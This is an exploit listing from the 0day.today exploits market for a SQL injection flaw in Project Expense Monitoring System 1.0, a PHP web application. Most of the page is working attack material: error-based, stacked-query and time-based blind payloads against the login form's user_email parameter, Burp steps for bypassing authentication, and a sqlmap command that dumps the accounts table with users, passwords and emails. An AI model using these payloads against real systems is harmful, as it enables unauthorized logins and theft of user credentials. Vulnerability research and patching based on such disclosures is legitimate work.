[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Project Expense Monitoring System 1.0 SQL Injection Vulnerability

Author
Richard Jones
Risk
[
Security Risk High
]
0day-ID
0day-ID-36051
Category
web applications
Date add
29-03-2021
Platform
php
# Exploit Title: Project Expense Monitoring System | SQL Login Bypass (Multiple)
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/14001/project-expense-monitoring-system-project-php-source-code-2020.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14001&title=Project+Expense+Monitoring+System+Project+in+PHP+With+Source+Code+
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Parameter: user_email (POST)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: user_email=joken@yahoo.com' AND GTID_SUBSET(CONCAT(0x716a6a6271,(SELECT (ELT(2231=2231,1))),0x71626b7a71),2231)-- zfOO&user_pass=a&btnLogin=Login
    Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: user_email=joken@yahoo.com';SELECT SLEEP(5)#&user_pass=a&btnLogin=Login
    Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_email=joken@yahoo.com' AND (SELECT 2456 FROM (SELECT(SLEEP(5)))Dqoh)-- MoOh&user_pass=a&btnLogin=Login
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

#URL: http://TARGET/pems/login.php

Steps: 
1) Capture post request in burp. 
2) Change post data to 
```
user_email=joken@yahoo.com' AND (SELECT 2456 FROM (SELECT(SLEEP(5)))Dqoh)-- MoOh&user_pass=a&btnLogin
```
3) Logged in.


Addition: 
Use sqlmap on the saved post request (save as sql.txt)
```
sqlmap -r sql.txt --batch -D pemsdb -T tblaccounts
```
Will list applications users,passwords,emails,accounttype

#  0day.today [2024-11-15]  #